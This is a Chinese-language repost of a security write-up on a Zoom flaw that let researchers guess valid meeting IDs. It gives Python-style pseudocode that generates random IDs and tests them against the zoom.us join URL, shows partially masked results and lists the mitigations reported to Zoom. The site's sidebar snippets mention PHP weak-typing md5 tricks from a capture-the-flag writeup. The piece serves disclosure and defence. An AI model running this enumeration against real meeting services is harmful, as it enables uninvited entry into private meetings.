热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Zoom安全漏洞分析

ang010ela 嘶吼专业版 本文分析一个ZOOM安全漏洞,以及如何利用该漏洞来识别和加入活动会议。文中的漏洞详情已经报告给了ZoomVideoCommunications公司,

 ang010ela 嘶吼专业版 

本文分析一个ZOOM安全漏洞,以及如何利用该漏洞来识别和加入活动会议。文中的漏洞详情已经报告给了Zoom Video Communications公司,Zoom也给出了一些缓解措施。

问题分析

使用Zoom的用户可能知道Zoom Meeting ID是由于9或10或11个数字组成的。如果没有启用“Require meeting password”选项或Waiting Room,这个9/10/11位的数字就唯一可以确保会议安全防止非认证用户接入的。

首先,研究人员预生成了一个可能有效的Zoom Meeting ID列表。从中随机选取1000个Meeting ID,并准备用URL字符串加入会议:

urls = []

for _ in range(1000):

urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

但是如何确定一个Zoom Meeting ID表示的是有效的会议呢?研究人员发现了一个快速、简易的方式来检查,就是根据在访问“Join Meeting” URL (https://zoom.us/j/{MEETING_ID}) 返回的响应的HTML Body的div元素来进行检查:

Invalid meeting ID.

然后研究人员尝试将以上方法自动化:

for url in urls:

    yield MakeHTTPRequest(url=url, callback=parseResponse)

 

def MakeHTTPRequest(url, callback)

    …

 

def parseResponse(response):

    if response.css('div#join-errormsg').get() is None:

        print('Valid Meeting ID found: {}'.format(response.url))

    else:

        print('Invalid Meeting ID'

运行的结果如下所示: 

Invalid Meeting ID

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/22XXX41X8

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Invalid Meeting ID

Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5

Invalid Meeting ID

Invalid Meeting ID

Bingo!

结果

研究人员在随机生成的Meeting ID中预测了大约4%的Meeting ID,与暴力破解相比,成功率还是非常高的。

缓解措施

研究人员在2019年7月22日联系了Zoom,并提出了以下缓解措施:

1. 重新实现Meeting ID生成算法

2. 用强加密的随机化函数替换现有随机函数

3. 增加Meeting ID的数字或符号的数量

4. 强制主机使用口令、PIN、SSO等进行认证。

本文参考自:https://research.checkpoint.com/2020/zoom-zoom-we-are-watching-you/


推荐阅读
  • 本文介绍了南邮ctf-web的writeup,包括签到题和md5 collision。在CTF比赛和渗透测试中,可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型,可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]
  • 篇首语:本文由编程笔记#小编为大家整理,主要介绍了VoLTE端到端业务详解|VoLTE用户注册流程相关的知识,希望对你有一定的参考价值。书籍来源:艾怀丽 ... [详细]
  • OWASP(安全防护、漏洞验证工具)开放式Web应用程序安全项目(OWASP,OpenWebApplicationSecurityProject)是一个组织 ... [详细]
  • 本文讨论了如何使用IF函数从基于有限输入列表的有限输出列表中获取输出,并提出了是否有更快/更有效的执行代码的方法。作者希望了解是否有办法缩短代码,并从自我开发的角度来看是否有更好的方法。提供的代码可以按原样工作,但作者想知道是否有更好的方法来执行这样的任务。 ... [详细]
  • 怎么在PHP项目中实现一个HTTP断点续传功能发布时间:2021-01-1916:26:06来源:亿速云阅读:96作者:Le ... [详细]
  • Google在I/O开发者大会详细介绍Android N系统的更新和安全性提升
    Google在2016年的I/O开发者大会上详细介绍了Android N系统的更新和安全性提升。Android N系统在安全方面支持无缝升级更新和修补漏洞,引入了基于文件的数据加密系统和移动版本的Chrome浏览器可以识别恶意网站等新的安全机制。在性能方面,Android N内置了先进的图形处理系统Vulkan,加入了JIT编译器以提高安装效率和减少应用程序的占用空间。此外,Android N还具有自动关闭长时间未使用的后台应用程序来释放系统资源的机制。 ... [详细]
  • 本文介绍了Python爬虫技术基础篇面向对象高级编程(中)中的多重继承概念。通过继承,子类可以扩展父类的功能。文章以动物类层次的设计为例,讨论了按照不同分类方式设计类层次的复杂性和多重继承的优势。最后给出了哺乳动物和鸟类的设计示例,以及能跑、能飞、宠物类和非宠物类的增加对类数量的影响。 ... [详细]
  • 欢乐的票圈重构之旅——RecyclerView的头尾布局增加
    项目重构的Git地址:https:github.comrazerdpFriendCircletreemain-dev项目同步更新的文集:http:www.jianshu.comno ... [详细]
  • ShiftLeft:将静态防护与运行时防护结合的持续性安全防护解决方案
    ShiftLeft公司是一家致力于将应用的静态防护和运行时防护与应用开发自动化工作流相结合以提升软件开发生命周期中的安全性的公司。传统的安全防护方式存在误报率高、人工成本高、耗时长等问题,而ShiftLeft提供的持续性安全防护解决方案能够解决这些问题。通过将下一代静态代码分析与应用开发自动化工作流中涉及的安全工具相结合,ShiftLeft帮助企业实现DevSecOps的安全部分,提供高效、准确的安全能力。 ... [详细]
  • GSIOpenSSH PAM_USER 安全绕过漏洞
    漏洞名称:GSI-OpenSSHPAM_USER安全绕过漏洞CNNVD编号:CNNVD-201304-097发布时间:2013-04-09 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
  • 本文探讨了容器技术在安全方面面临的挑战,并提出了相应的解决方案。多租户保护、用户访问控制、中毒的镜像、验证和加密、容器守护以及容器监控都是容器技术中需要关注的安全问题。通过在虚拟机中运行容器、限制特权升级、使用受信任的镜像库、进行验证和加密、限制容器守护进程的访问以及监控容器栈,可以提高容器技术的安全性。未来,随着容器技术的发展,还需解决诸如硬件支持、软件定义基础设施集成等挑战。 ... [详细]
  • 玩转直播系列之消息模块演进(3)
    一、背景即时消息(IM)系统是直播系统重要的组成部分,一个稳定的,有容错的,灵活的,支持高并发的消息模块是影响直播系统用户体验的重要因素。IM长连接服务在直播系统有发挥着举足轻重的 ... [详细]
  • 浅解XXE与Portswigger Web Sec
    XXE与PortswiggerWebSec​相关链接:​博客园​安全脉搏​FreeBuf​XML的全称为XML外部实体注入,在学习的过程中发现有回显的XXE并不多,而 ... [详细]
author-avatar
阁下贵姓
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有